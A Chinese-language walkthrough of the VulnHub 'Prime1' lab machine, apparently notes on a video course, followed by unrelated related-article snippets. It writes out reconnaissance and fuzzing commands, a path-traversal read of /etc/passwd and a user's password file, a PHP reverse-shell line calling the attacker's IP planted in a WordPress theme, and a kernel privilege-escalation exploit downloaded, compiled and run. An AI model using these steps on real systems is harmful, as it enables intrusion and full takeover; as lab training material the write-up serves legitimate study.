「红队笔记」靶机精讲:Prime1 - 信息收集和分析能力的试炼

news2024/12/23 7:07:08

「红队笔记」靶机精讲:Prime1 - 信息收集和分析能力的试炼

本文是作者在观看 B 站《红队笔记》后做的一些笔记及相关知识的补充。学渗透特别推荐大家去看。如有侵权,请联系作者,作者看到后会第一时间删除。

靶机精讲之Prime1,vulnhub靶机,信息收集和分析能力的试炼,可以先盲打,看能否按图索骥。中间还是涉及模糊测试、wordpress利用,常规打法,但也需要扎实的基本功。提权可用内核提权。

– 红队笔记

nmap 五部曲
主机发现
sudo nmap -sn 10.10.10.0/24

靶机 IP 为 10.10.10.22 。

端口扫描
sudo nmap --min-rate 10000 -p- 10.10.10.22

发现 22 和 80 两个端口是开放的。22 端口是熟知的 ssh 服务,80 端口是 web 服务。

全面扫描
sudo nmap -sT -sV -O -p22,80 10.10.10.22
UDP 扫描
sudo nmap -sU -p22,80 10.10.10.22
漏洞脚本扫描
sudo nmap --script=vuln -p22,80 10.10.10.22
访问 web 页面

既然开放了 web 网站,那么先访问一下看看。

只有一张图片,是 kali 的龙形象:

HacknPentest:Penetration Testing (或简称 PenTest ),即渗透测试,中间的 n 可能是 and 的意思。

在这里插入图片描述

查看源代码:

没发现什么有价值的东西,hnp 应该是 HacknPentest 的缩写。

在这里插入图片描述

进行目录爆破

目录爆破的工具有很多种,比如 dirsearch ,gobuster,feroxbuster,dirb ,不同工具的运行机制可能有所不同,但是比起切换工具,我们更应该关注一个工具其中的参数的设置和字典的设置,把一个工具用精。

可以用 man 命令查看 dirb 的参数:

man dirb
使用 dirb 进行默认扫描:
dirb http://10.10.10.22 -o report/dirb.txt

在扫描结果中发现当前目录下有一个 dev 目录,很可疑。

使用 curl 获取响应内容:
sudo curl http://10.10.10.22/dev

执行该命令会发送一个 GET 请求到 IP 地址为 10.10.10.22 的服务器的 ./dev 路径,并返回服务器的响应内容。具体返回的内容取决于服务器的配置和 ./dev 路径下的资源。

返回结果:

在这里插入图片描述

这里给了一些提示,要我们再挖掘的深入一点。大概是目录爆破要再精确一点的意思。

使用 wget 保存响应内容:
sudo wget http://10.10.10.22/dev -o report/dev

既然是信息,那就先保存一下。

用 dirb 指定文件后缀名进行扫描
dirb http://10.10.10.22 -X .zip,.txt -o report/dirbvaryhard.txt

在当前目录下发现了一个 secret.txt 文件。

依然是用 curl 获取文件内容

curl http://10.10.10.22/secret.txt

返回结果:

在这里插入图片描述

在每一个你发现的 PHP 文件做一些 fuzz (模糊测试),如果你仍然卡在这,可以访问下面的链接。链接中给了一个做模糊测试的工具。

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

OSCP ( Offensive Security Certified Professional ) 是一个国际性的安全从业人员的专业技能认证证书,由 Kali Linux 官方组织颁布。

这里其实已经很明确的提示我们要去找 PHP 文件了。

这是一个比较重要的信息,用 wget 保存一下:

sudo wget http://10.10.10.22/secret.txt -o report/secret.txt
dirb 指定后缀名为 php 的扫描
dirb http://10.10.10.22 -X .php -o report/dirbphp.txt

结果发现当前目录下存在 index.php 和 image.php 两个文件。接下来要对这两个文件做模糊测试。

用 wfuzz 工具进行模糊测试

模糊测试是一种自动或半自动的测试技术,常被用来发现软件/操作系统/网络的代码中的错误和安全性问题,其中用于输入随机的数据和不合法的数据被称为“FUZZ”。之后,系统将被监视各种异常,如系统崩溃或内置代码失败等。

上面那个链接给了一条命令:

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something

wfuzz 是一个模糊测试工具,kali 中默认已安装。

查看帮助文档:
wfuzz --help 

-c : Output with colors. 输出结果高亮显示。

-w wordlist : Specify a wordlist file (alias for -z file,wordlist). 指定一个单词列表文件(-z文件的别名,单词列表)。

–hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline).

这是一个过滤器,指定按哪一列的值进行过滤。(其输出结果有五列,分别是 code/lines/words/chars/payload ,表示状态码/行数/长度/字节数/攻击载荷)。

–hc 404 就是不显示 code 列值为 404 的行,–hw 500 就是不显示 words 列值为 500 的行。

将上面的命令稍作修改:

对 image.php 进行模糊测试
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://10.10.10.22/image.php?FUZZ=RedTeamNotes

最后的 FUZZ=something 等号右边可以随便改。

发现结果中 code 列全为 200 ,lines 列全为 6 ,words 列全为 12 ,chars 列全为 147 。显然,需要找出特别的行,像这种一样的大多数行几乎不可能是想要的结果。

因此对上面的结果做一些筛选:

挑选 words 列不为 12 的行:
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://10.10.10.22/image.php?FUZZ=RedTeamNotes

无结果。

挑选 chars 列不为 147 的行:
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 147 http://10.10.10.22/image.php?FUZZ=RedTeamNotes

还是无结果。

既然这个文件没有什么发现,那就对另一个文件做模糊测试。

对 index.php 进行模糊测试
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://10.10.10.22/index.php?FUZZ=RedTeamNotes

发现结果中 code 列全为 200 ,lines 列全为 7 ,words 列全为 12 ,chars 列全为 136 。

挑选 chars 列不为 136 的行:
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://10.10.10.22/index.php?FUZZ=RedTeamNotes

结果只有一行,该行的 payload 为 " file " 。

继续深入
将 file 作为参数去访问 index.php 页面:
sudo curl http://10.10.10.22/index.php?file

响应内容:

在这里插入图片描述

你正在挖一个错误的文件。

保存响应内容

sudo curl http://10.10.10.22/index.php?file > report/wrongnotice.txt

既然这是一个错误的文件,那正确的文件是什么呢?还记得之前 secret.txt 文件的内容吗。最后一句话提示去查看 location.txt 文件。

当然不是指当前目录下的 location.txt ,因为之前 dirb 都没扫出来有这个文件,那要怎么查看呢,以 file 作为参数的话,是否可以查看呢?

sudo curl http://10.10.10.22/index.php?file=location.txt

返回结果:

在这里插入图片描述

现在你已经找到了精确的参数,接着往下挖。使用 “secrettier360” 参数在其他的一些 PHP 页面做测试。

显然,除了 index.php ,就只有 image.php 了。

使用 scrot 截屏保存该信息:
scrot -s report/location.png
使用 xdg-open 查看图片
xdg-open report/location.png
将 secrettier360 作为参数去访问 image.php 页面:
sudo curl http://10.10.10.22/image.php?secrettier360

返回结果:

在这里插入图片描述

最终你得到了正确的参数。

保存响应内容

sudo curl http://10.10.10.22/image.php?secrettier360 -o report/rightpara.txt

都到这一步了,当然要试试文件包含了。

本地文件包含

由于暂时找不到更多的信息,又提示找到了正确的参数,那么就试试本地文件包含吧。

sudo curl http://10.10.10.22/image.php?secrettier360=../../../../../../etc/passwd

成功回显结果:

在这里插入图片描述

保存结果

sudo curl http://10.10.10.22/image.php?secrettier360=../../../../../../etc/passwd -o report/passwd.txt

注意到结果中有三个有价值的用户:root,victor,saket 。一般除了 root 以外的正常用户都在后面,因为是新添加的。

其中 root,victor 都是给了 /bin/bash 交互环境,saket 则是放在正常用户应该在的家目录下(/home)。

在 saket 用户的描述中提示可以在 /home/saket 目录下找到一个 password.txt 文件。

那么依然是利用文件包含来获取该文件

sudo curl http://10.10.10.22/image.php?secrettier360=../../../../../../home/saket/password.txt

返回结果:

在这里插入图片描述

保存结果:

sudo curl http://10.10.10.22/image.php?secrettier360=../../../../../../home/saket/password.txt -o password.txt

在这里获得了一个密码:follow_the_ippsec ,那么这个密码在哪用呢。

尝试 ssh 连接
ssh victor@10.10.10.22
ssh saket@10.10.10.22

均失败。

其实之前在用 dirb 扫描的时候有扫出一个 WordPress 文件夹,但是当时没有去看,因为看到了更直接的 dev 文件,但是现在是时候回过头来看看了。

WordPress 内容管理系统

WordPress 是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用 PHP 语言和 MySQL 数据库开发的,用户可以在支持 PHP 和 MySQL 数据库的服务器上使用自己的博客。

WordPress 的使用量居全球第一,碾压了其他内容管理系统,在一个名为钟馗之眼(https://www.zoomeye.org/about)的网站上可以查看。

在这里插入图片描述

在这里插入图片描述

使用 wpscan 进行漏洞扫描

Wpscan 是一款 kali linux 开源的命令行工具,专门用于扫描和识别 WordPress 网站中的漏洞和安全问题。它可以帮助安全研究人员、渗透测试人员以及网站管理员识别和修复 WordPress 网站可能存在的安全漏洞。

下载 wpscan

apt install wpscan

查看帮助文档

wpscan --help

执行扫描

sudo wpscan --url http://10.10.10.22/wordpress -e u

–url URL The URL of the blog to scan. 要扫描的博客的URL 。
Allowed Protocols: http, https. 允许的协议:http,https 。
Default Protocol if none provided: http. 默认协议(如果未提供):http 。
This option is mandatory unless update or help or hh or version is/are supplied.

​ 除非提供了更新、帮助、hh或版本,否则此选项是强制性的。

-e, --enumerate [OPTS] Enumeration Process 枚举过程
Available Choices: 可用选项:
vp Vulnerable plugins vp 易受攻击的插件
ap All plugins ap 所有插件
p Popular plugins p 热门插件
vt Vulnerable themes vt 易受害主题
at All themes at 所有主题
t Popular themes t 流行的主题
tt Timthumbs tt 蒂姆拇指
cb Config backups cb 配置备份
dbe Db exports dbe Db导出
u User IDs range. e.g: u1-5 u 用户ID范围。例如:u1-5
Range separator to use: ‘-’ 范围分隔符用:“-”
Value if no argument supplied: 1-10 如果未提供参数,则为值:1-10

enumerate – 枚举,-e 指定要列举什么。

这里只扫描有哪些用户,是因为拿到了密码,但不知道用户名是什么。

输出结果:

在这里插入图片描述

可见只有一个名为 victor 的用户,但其实这个用户名在 WordPress 页面也能看到。

保存输出结果:

sudo wpscan --url http://10.10.10.22/wordpress -e u -o report/wordpress.txt
登录到后台

回去看看 dirb 的扫描结果:

在这里插入图片描述

其实 WordPress 的后台登录界面就是在 ./wordpress/wp-admin ,这个路径可以记住。

用户名:victor

密码:follow_the_ippsec

成功登录到后台。

wordpress 网站渗透

一般在做网站渗透的时候要特别注意上传文件的地方,比如 WordPress 后台有上传 plugins(插件) 的地方,还有上传 themes(主题) 的地方。常见的还有上传头像的地方。

插件上传处要求是 zip 文件,先传一个正常的 zip 文件看能不能上传。结果的不能的,从返回结果来看似乎父目录没有足够的权限。

这条路走不通。

在后台的 appearence->themes editor 处可以编辑文件,在这里尝试插入木马。当然,插入什么之前要看看有没有修改权限。这里的大部分文件都是没有修改权限的。没有修改权限的话在最下面会有一句话:

“You need to make this file writable before you can save your changes.”

像什么 css,js,json 文件都没有什么价值,因为它们不具备执行性。该网站使用 PHP 语言作为在服务器端执行的脚本语言,所以我们主要找 PHP 文件即可,

在此处遍历 PHP 文件,最终发现一个 secret.php 文件,具备写入权限。

写入马子:

<?php exec("/bin/bash -c 'bash -i /dev/tcp/10.10.10.3/443 0>&1'") ?>

exec 函数是 PHP 中常用的一种执行外部系统命令的函数,可以让 PHP 程序直接调用操作系统的命令行执行命令。

/bin/bash -c 是一个 Linux 命令,它的作用是在一个新的 Bash shell 中执行给定的命令。其中 /bin/bash 是 Bash shell 的路径,-c 是一个选项,表示后面跟着的是要执行的命令。

保存修改。

kali 开启监听:

nc -lvnp 443

访问 secret.php 页面,可以看到 kali 中已经获得该机器的权限。

提权
信息搜集

whoami 查看当前用户信息,当前拿到的是 www-data 的权限,这是一个低权限用户。

uname -a 查看系统信息:

在这里插入图片描述

sudo -l 查看当前用户的权限:

在这里插入图片描述

当前用户对于 /home/saket/enc 文件具有 root 权限,且可以无需密码执行。

cd  /home/saket
ls -liah

发现当前用户对于 /home/saket/enc 仅有执行权限,而没有查看和写入权限。

cat /etc/crontab 查看定时任务:

在这里插入图片描述

显然没有权限。

/etc/passwd 可以看,但是 /etc/shadow 不能看,那就无法破解密码。

内核漏洞提权

在上面的结果中可以看出该靶机的内核版本较低( linux ubuntu 4.10.0-28-generic ),可能存在内核漏洞。

searchsploit 命令检索漏洞信息

关于 searchsploit

searchsploit 是一款开源的漏洞利用和漏洞扫描工具,它提供了一个简单的命令行界面,让用户能够搜索到漏洞利用和漏洞扫描工具中所包含的所有漏洞的专利权。这些漏洞利用和漏洞扫描工具的漏洞信息来自于一些公开的漏洞数据库,如 NVD、CVE、OSVDB 等等。使用 searchsploit 可以快速搜索到特定漏洞的版本,提高漏洞利用的效率。

这个工具可以称得上是渗透利器了,可以多多使用哦~。

使用方法

searchsploit 的使用方法如下:

  1. 搜索漏洞:使用命令 searchsploit <关键字> 来搜索特定的漏洞。例如,searchsploit wordpress 可以搜索与 WordPress 相关的漏洞。

  2. 显示漏洞详细信息:使用命令 searchsploit -x <漏洞编号> 来显示特定漏洞的详细信息。漏洞编号可以从搜索结果中获取。

  3. 下载漏洞利用脚本或漏洞扫描工具:使用命令 searchsploit -m <漏洞编号> 来下载特定漏洞的利用脚本或扫描工具。下载的文件将保存在当前目录中。

  4. 更新漏洞库:使用命令 searchsploit -u 来更新漏洞库,以获取最新的漏洞信息。

  5. 显示搜索结果的详细信息:使用命令 searchsploit -p <漏洞编号> 来显示特定漏洞利用程序的详细信息。

  6. 显示漏洞利用程序的漏洞文件路径:使用命令 searchsploit -f <漏洞编号> 来显示特定漏洞利用程序的漏洞文件路径。

请注意,searchsploit 的漏洞库需要定期更新以获取最新的漏洞信息。

searchsploit Linux ubuntu 4.10.0-28
┌──(root㉿kali)-[~]
└─# searchsploit linux ubuntu 4.10.0-28

--------------------------------------------------------------------------------------- --------------------

 Exploit Title                                                                         |  Path

--------------------------------------------------------------------------------------- --------------------

Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                   | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation          | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt

--------------------------------------------------------------------------------------- --------------------

Shellcodes: No Results

这段输出信息中包含了三个漏洞的利用程序信息,以及其在 searchsploit 安装目录中的路径。具体来说:

  • 第一个漏洞是针对 Linux Kernel 4.10.5 和低于 4.14.3 版本存在的 DCCP Socket Use-After-Free 漏洞的攻击代码。攻击代码路径为 linux/dos/43234.c。该攻击代码可用于实现攻击,导致目标系统遭受拒绝服务(DoS)攻击。

  • 第二个漏洞是针对 Ubuntu 16.04 及 Fedora 27 等系统上存在的本地提权漏洞的攻击代码,该漏洞可导致攻击者获得系统管理员权限。攻击代码路径为 linux/local/45010.c

  • 第三个漏洞是针对 Ubuntu 15.10 及以下系统上存在的一个命名空间特权提升漏洞的攻击代码。攻击代码路径为 linux/local/41760.txt,并提供了漏洞的详细描述。

最后,searchsploit 还提供了 Shellcodes 和 Exploit-db 的其他搜索结果。然而,搜索结果未显示 Shellcode 和其他利用程序的结果。

这里利用一下第二个漏洞:

searchsploit linux ubuntu -m 45010

-m 选项表示下载漏洞利用模块,这个命令的作用是使用 searchsploit 工具在本地数据库中搜索包含字符串linuxubuntu,并过滤出45010编号的漏洞利用脚本,然后将该漏洞利用脚本下载到当前目录中。

ls 
# 发现当前目录下多了一个 45010.c 的文件,这是一个用 C 语言编写的漏洞利用脚本。
cat 45010.c 
# 要养成查看文件的好习惯
将漏洞利用脚本上传到靶机上

kali 上使用:

sudo php -S 0:80
 -S <addr>:<port> Run with built-in web server.

这条命令相当于在本地开启一个服务器,可以用自己的浏览器通过 http://127.0.0.1 来访问。

此时,在靶机上已经拿到了 www-data 的权限,在这里执行命令:

wget http://10.10.10.3/45010.c

将 kali 上的 45010.c 文件下载到靶机上,用这种方式传输文件,新奇。10.10.10.3 是攻击机 kali 的 ip 。

由于 C 语言文件需要编译后才能运行,故而这里有两种方式,一种是在攻击机上编译后再传到靶机上,另一种就是直接在靶机上编译。

第一种

kali 上用 gcc 编译该 C 文件:

gcc 45010.c -o 45010

-o 指定编译后的文件名,如果不指定的话默认的输出文件为 a.out 。

靶机上用 wget 下载该文件:

wget http://10.10.10.3/45010

靶机上运行该文件:

./45010

但这种方法可能有问题,在本次试验中不成功。

第二种:

靶机上用 wget 下载源文件:

wget http://10.10.10.3/45010.c

这样下载的文件,当前的 www-data 用户对其有着全部的权限。

靶机上编译源文件:

gcc 45010.c -o 45010

靶机上运行该文件:

./45010

这种方法要求靶机上已经安装好了 gcc 编译器。

本次试验中第二种方法成功执行。

此时执行 whoami ,发现已经是 root 权限,但是没有命令提示符,执行下面的命令以获得命令提示符:

# 查看当前安装了哪些软件包,是否安装了 python 程序:
dpkg -l
# 如有 python 程序,执行一下命令获取命令提示符:
python -c "import pty;pty.spawn('/bin/bash');"

至此,这台靶机渗透完成。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1304728.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【数据结构与算法】JavaScript实现图结构

文章目录 一、图论1.1.图的简介1.2.图的表示邻接矩阵邻接表 二、封装图结构2.1.添加字典类和队列类2.2.创建图类2.3.添加顶点与边2.4.转换为字符串输出2.5.图的遍历广度优先搜索深度优先搜索 2.6.完整实现 一、图论 1.1.图的简介 什么是图&#xff1f; 图结构是一种与树结构…

适合无线通信设备应用 TSS-53LNB+、TSS-53LNB3+、TSS-183A+、TSS-13LN+、TSS-23LN+低噪声、增益放大器【RF】

1、TSS-53LNB 射频放大器 IC 通用 500MHz 至5GHz&#xff0c;12MCLP TSS-53LNB&#xff08;符合RoHS标准&#xff09;是一款先进的超平坦增益低噪声宽带放大器&#xff0c;采用E-PHEMT技术制造&#xff0c;在宽频率范围内提供极高的动态范围。它集成了开关&#xff0c;使用户能…

Maxscript入门教程:Print与Format命令

本文对Maxscript中的“Print”和“Format”命令之间的差异进行了一些小小的研究&#xff0c;得出的结论主要的差异是它们的结果中的引号“”。 “Print”很简单&#xff0c;直接使用&#xff0c;在调试时非常有用。为了工作&#xff0c;它只需要一个字符串&#xff08;这是两个…

北斗卫星开启高效应急救援新篇章

北斗卫星开启高效应急救援新篇章 在现代社会&#xff0c;灾害频发给人类带来了巨大的生命和财产损失&#xff0c;高效的应急救援能力对提升抗灾拯救生命具有举足轻重的作用。作为中国自主研发的全球卫星导航系统&#xff0c;北斗卫星系统已逐渐发展成为全球应急救援的重要力量&…

数据库(一)| 数据库概述、基本概念、关系型数据库特点、超键候选码等

文章目录 1 数据库的一些基础概念1.1 数据库和数据库管理系统1.2 关系模式和关系实例1.3 数据库模式和数据库实例 2 数据库组织形式2.1 数据采用文件的缺点2.2 使用数据库管理系统的 优点 3 关系型数据库特点4 三个层次的数据抽象Data Abstraction5 超键、候选码、主码、外码 1…

LeetCode-654. 最大二叉树【栈 树 数组 分治 二叉树 单调栈】

LeetCode-654. 最大二叉树【栈 树 数组 分治 二叉树 单调栈】 题目描述&#xff1a;解题思路一&#xff1a;递归&#xff0c;这个问题的难点在于如何找到每个子数组的最大值。此处用的是暴力查找最大值&#xff0c;然后递归构建左右子树。解题思路二&#xff1a;单调栈&#xf…

如何实现更有效率的产线各工业设备数据采集?

随着工业物联网的发展&#xff0c;工业设备的智能化水平越来越高&#xff0c;然而设备的通讯受限于不同设备的物理链路、各种不同的协议&#xff0c;因此大多数设备数据不能互联互通。宝贵的数据被白白浪费掉&#xff0c;无法进行统一管理分析&#xff0c;因此亟需解决这一难题…

做数据分析为何要学统计学(9)——什么是回归分析

​回归分析&#xff08;regression analysis)是量化两种或两种以上因素/变量间相互依赖关系的统计分析方法。回归分析根据因素的数量&#xff0c;分为一元回归和多元回归分析&#xff1b;按因素之间依赖关系的复杂程度&#xff0c;可分为线性回归分析和非线性回归分析。我们通过…

【带头学C++】----- 九、类和对象 ---- 9.12 C++之友元函数(9.12.5---9.12.7)

❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️创做不易&#xff0c;麻烦点个关注❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️ ❤️❤️❤️❤️❤️❤️❤️❤️❤️文末有惊喜&#xff01;献舞一支&#xff01;❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️ 目录 补充上…

软文营销怎么做才能“人性化”,媒介盒子有妙招

软文营销已经成为品牌宣传的重要方式之一&#xff0c;想要做好软文营销&#xff0c;则要避免高高在上的宣传&#xff0c;围绕用户心理&#xff0c;打造人性化的内容。今天媒介盒子就来和大家聊聊软文营销怎么做才能人性化。 一、以情感驱动用户 形成用户印象所需要的时间是1/1…

Netflix Mac(奈飞客户端)激活版软件介绍

Netflix Mac(奈飞客户端)是一款流行的视频播放软件&#xff0c;专为Mac用户设计。它提供了大量的高质量电影、电视剧、纪录片和动画片资源&#xff0c;让用户可以随时随地观看自己喜欢的内容。 首先&#xff0c;Netflix Mac(奈飞客户端)以其简洁直观的用户界面而闻名。用户可以…

用FPGA实现四通道、全频率 GNSS RF 接收器-用于卫星的精确定位

用FPGA实现四通道、全频率 GNSS RF 接收器-用于卫星的精确定位 概念 全球导航卫星系统&#xff08;英文&#xff1a;Global Navigation Satellite System&#xff0c;GNSS &#xff09;&#xff0c;又称全球卫星导航系统&#xff0c;是能在地球表面或近地空间的任何地点为用户提…

阿木实验室普罗米修斯项目环境配置

引言 普罗米修斯项目其实只是个大ROS功能包&#xff0c; 里面每个模块就是每个ROS功能包&#xff0c;比如控制模块&#xff0c;视觉模块等等。对PX4配置的与这个一样&#xff0c;另外他是使用自己的P系列无人机&#xff08;我个人是&#xff30;450&#xff09;&#xff0c;所…

LAMP的搭建

LAMP概述 LAMP架构是目前成熟的企业网站应用模式之一&#xff0c;指的是协同工作的一整套系统和相关软件&#xff0c;能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词&#xff0c;具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP&#xff08;或…

[学习笔记]在CentOS7中用Docker方式安装Jenkins

文章目录 原理&#xff1a;创建Docker网桥网络安装DinD创建镜像构建镜像运行容器 原理&#xff1a; Docker in Docker &#xff08;以下简称 DinD&#xff09;可以在 Container 中直接运行一个 Docker Daemon &#xff0c;然后使用 Container 中的 Docker CLI 工具操作容器。其…

做数据分析为何要学统计学(6)——什么问题适合使用t检验?

t检验&#xff08;Students t test&#xff09;&#xff0c;主要依靠总体正态分布的小样本&#xff08;例如n < 30&#xff09;对总体均值水平进行差异性判断。 t检验要求样本不能超过两组&#xff0c;且每组样本总体服从正态分布&#xff08;对于三组以上样本的&#xff0…

apt-get update失败

一、先验证是否有网络 rootlocalhost:~# ping www.baidu.com ping: www.baidu.com: Temporary failure in name resolution rootlocalhost:~# 说明没有网&#xff0c;参考&#xff1a;https://blog.csdn.net/qq_43445867/article/details/132384031 sudo vim /etc/resolv.con…

windows如何解决端口冲突(实用篇)

在项目设计中&#xff0c;环境配置成功点击运行瞬间&#xff0c;一大堆红爆出&#xff0c;8080端口占用&#xff0c;这个是很烦人的。。。 解决方式&#xff1a; 笨方法&#xff1a;一、查看所有端口实用情况&#xff08;挨个扫&#xff09; 按住【WINR】快捷键打开运行输入…

报表控件FastReport .NET v2024功能演示—更改图图片形状

报表生成器FastReport .NET 是适用于.NET Core 3&#xff0c;ASP.NET&#xff0c;MVC和Windows窗体的全功能报告库。使用FastReport .NET&#xff0c;您可以创建独立于应用程序的.NET报告。 FastReport .net下载&#xff08;qun&#xff1a;585577353&#xff09;https://www.e…

靠着这份280页的前端面试指南,拿下了字节跳动offer

笔者是在今年秋招面试的头条教育线&#xff0c;顺利拿到了offer&#xff0c;把还记得的东西写下来&#xff0c;供大家参考一下。 一面 tcp 和 udp 的区别和使用场景&#xff1f;quic 基于 udp 怎么保证可靠性&#xff1f;讲一下同源策略和跨域方案&#xff1f;CORS 的几个头部…